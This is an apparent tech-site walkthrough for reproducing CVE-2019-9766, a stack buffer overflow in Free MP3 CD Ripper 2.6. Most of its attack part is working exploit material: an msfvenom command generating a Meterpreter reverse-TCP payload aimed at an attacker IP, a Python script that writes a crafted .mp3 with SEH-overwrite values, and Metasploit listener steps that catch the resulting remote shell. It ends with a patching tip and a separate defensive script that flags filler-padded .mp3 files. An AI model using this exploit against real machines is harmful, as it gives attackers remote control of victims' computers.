2025-02-24 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
How to reproduce the Free MP3 CD Ripper buffer overflow remote code execution vulnerability (CVE-2019-9766)
Many newcomers are unclear about how this vulnerability is reproduced, so this article walks through it in detail.
Vulnerability overview:
Free MP3 CD Ripper is an audio format converter.
A stack buffer overflow vulnerability exists in Free MP3 CD Ripper version 2.6. Remote attackers can exploit this vulnerability to execute arbitrary code with a specially crafted .mp3 file.
Threat type: Remote code execution
Threat level: High
Vulnerability number: CVE-2019-9766
Affected system and application version: Free MP3 CD Ripper 2.6
Reproducing the vulnerability:
Attacker machine: Kali 2020, Kali 2019
IP: 192.168.6.146
Victim: Windows 10, with Free MP3 CD Ripper version 2.6 installed
IP: 192.168.6.142
1. Build the environment
On Windows 10, download and install Free MP3 CD Ripper version 2.6.
Use msf to generate reverse-connection shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.6.146 lport=888 -f c --smallest
Replace the shellcode in the script with the generated output.
Write a script to generate a .mp3 file:
# Stack-based buffer overflow in Free MP3 CD Ripper 2.6
buffer = "A" * 4116              # filler up to the SEH record
NSEH = "\xeb\x06\x90\x90"        # next-SEH field
SEH = "\x84\x20\xe4\x66"         # SEH handler field
nops = "\x90" * 5
buf = ""
# buf += "..." lines: the shellcode generated with msfvenom in the previous step
pad = "B" * (316 - len(nops) - len(buf))
payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f = open("Test_Free_MP3.mp3", "w")
    print("[+] Creating %s bytes mp3 Files..." % len(payload))
    f.write(payload)
    f.close()
    print("[+] mp3 File created successfully!")
except:
    print("File cannot be created!")
Run the script to generate the .mp3 file.
Copy the generated .mp3 file to the Windows 10 machine (VMtools required).
Start msfconsole on Kali.
Use the exploit/multi/handler module.
Set lhost, lport and the attack payload.
Start the listener on Kali.
On Windows 10, open the .mp3 file with Free MP3 CD Ripper.
The reverse shell connects back to Kali.
Execute a command.
The vulnerability has been exploited successfully.
PS: let me mention a pitfall I ran into. This is really the first time I've ever encountered this situation:
The attacker machine needs to be the Kali 2019 version; with version 2020 the exploit does not work. I tried many times with 2020 but failed, and finally succeeded with 2019. Has any expert run into this situation and can share their experience?
2. Repair suggestion
Update Free MP3 CD Ripper to the latest version promptly.
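Where the update cannot be applied immediately, files like the one generated in the reproduction can be screened before they reach the application. The following triage check is an added example, not part of the original article: it flags .mp3 files that lack an ID3 tag or MPEG frame sync and begin with a long run of one repeated byte, as the 4116-byte "A" filler does. The function names, the FILLER_RUN threshold and the sample files are assumptions constructed for illustration.

```python
import os
import tempfile

FILLER_RUN = 1024  # assumed threshold: a leading run this long of one byte is not audio

def looks_like_mp3(head):
    """True if the data starts with an ID3v2 tag or an MPEG audio frame sync."""
    if head[:3] == b"ID3":
        return True
    # Frame sync is 11 set bits; the layer field (bits 2-1) must not be the reserved 00.
    return (len(head) >= 2 and head[0] == 0xFF
            and (head[1] & 0xE0) == 0xE0 and (head[1] & 0x06) != 0)

def leading_run(head):
    """Length of the run of the first byte repeated at the start of the data."""
    return len(head) - len(head.lstrip(head[:1])) if head else 0

def triage(path):
    """Classify a file named .mp3 as 'ok', 'suspicious-filler' or 'not-mp3'."""
    with open(path, "rb") as f:
        head = f.read(8192)
    if looks_like_mp3(head):
        return "ok"
    if leading_run(head) >= FILLER_RUN:
        return "suspicious-filler"
    return "not-mp3"

def demo():
    """Run triage over constructed sample files (not real audio, not real captures)."""
    samples = {
        "tagged.mp3": b"ID3\x04\x00\x00\x00\x00\x00\x00" + b"\x00" * 64,
        "frame.mp3": b"\xff\xfb\x90\x00" + b"\x00" * 64,
        "filler.mp3": b"A" * 4116 + b"B" * 324,  # same layout as the article's filler
        "notes.mp3": b"plain text saved with the wrong extension\n",
    }
    results = {}
    with tempfile.TemporaryDirectory() as d:
        for name, data in samples.items():
            path = os.path.join(d, name)
            with open(path, "wb") as f:
                f.write(data)
            results[name] = triage(path)
    return results

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Audio files that carry leading junk before the first frame are reported as "not-mp3" by this heuristic, so treat that verdict as a prompt for review rather than as proof of tampering.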